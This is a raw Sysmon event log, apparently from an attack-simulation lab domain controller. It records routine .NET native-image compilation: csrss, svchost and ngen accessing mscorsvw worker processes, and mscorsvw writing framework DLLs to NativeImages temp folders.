13:51:31.272{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8B04-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.272{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8B04-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:31.225{59A5CD1D-9263-6005-8A04-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c08-0\System.Web.RegularExpressions.dll2021-01-18 13:51:31.225 10341000x80000000000000008799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.100{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8A04-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.084{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8A04-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.084{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8A04-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.053{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8904-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.037{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8904-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:31.037{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8904-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:32.991{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9264-6005-8F04-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 
10341000x80000000000000008815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:32.991{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9264-6005-8F04-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:32.881{59A5CD1D-9263-6005-8E04-00000000A301}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11dc-0\System.Windows.Controls.Ribbon.dll2021-01-18 13:51:32.881 
10341000x80000000000000008820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:33.116{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9265-6005-9004-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:33.100{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9265-6005-9004-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:33.100{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9265-6005-9004-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:32.991{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9264-6005-8F04-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000008821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:34.944{59A5CD1D-9265-6005-9004-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd4-0\System.Windows.Forms.DataVisualization.dll2021-01-18 13:51:34.944 10341000x80000000000000008845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.850{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9704-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.850{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9704-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.850{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9704-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:35.787{59A5CD1D-9267-6005-9604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\3e4-0\System.Windows.Presentation.dll2021-01-18 13:51:35.787 10341000x80000000000000008841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.694{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.678{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.678{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.631{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9504-00000000A301}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.615{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9504-00000000A301}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:35.615{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9504-00000000A301}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v